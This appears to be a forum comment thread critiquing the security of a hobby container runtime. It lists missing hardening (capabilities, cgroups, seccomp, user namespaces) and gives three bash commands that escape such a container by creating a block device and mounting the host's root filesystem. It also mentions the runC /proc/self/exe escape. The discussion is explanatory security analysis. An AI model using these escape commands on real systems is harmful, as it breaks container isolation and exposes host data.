| Definitely not secure. The author did a great job explaining container runtimes in basic terms, but there's a lot of security features missing. Mainly:
* Reducing the container's capabilities
* Restricting access to resources through cgroups
* Applying seccomp filters to prevent certain syscalls. As another comment suggested, user namespaces are another hardening feature, but not all container runtimes enable it by default. Podman does, Docker doesn't. In fact user namespaces are so powerful that I believe they pretty much cover most of the hardening provided by the three features I listed above. If you're wondering why they're not enabled by default in Docker, take a look at this [1]. Exploiting the missing isolation mechanisms, the following bash commands will allow you to escape from the author's containers: $ ls -al /sys/dev/block # find the root fs device (e.g. /dev/sda1) major and minor device numbers (e.g. {maj=8, min=1}, {maj=259, min=1}) $ mknod --mode 0600 /dev/host_fs_dev b $major $minor $ mkdir /host_fs && mount /dev/host_fs_dev /host_fs (warning: shameless plug to my posts follows:) If you want more details, I wrote a post on this exact same problem in the context of three vulnerabilities I found in rkt (another container runtime) [2]. Beside the issues above, the author's runtime also exposes host file descriptors like /proc/self/exe that can be used to escape the container. This is a post I wrote on runC CVE-2019-5736 that explains this kind of issues. [1] https://docs.docker.com/engine/security/userns-remap/#user-n...
[2] https://unit42.paloaltonetworks.com/breaking-out-of-coresos-...
[3] https://unit42.paloaltonetworks.com/breaking-docker-via-runc... |
Could you please explain/point me to some information/source, why docker can't use -net=host namespace if userns is enabled, while on the other hand rootlesskit[1] which uses userns by default, dont have problem with using host netns (--net=host) ?
[1] https://github.com/rootless-containers/rootlesskit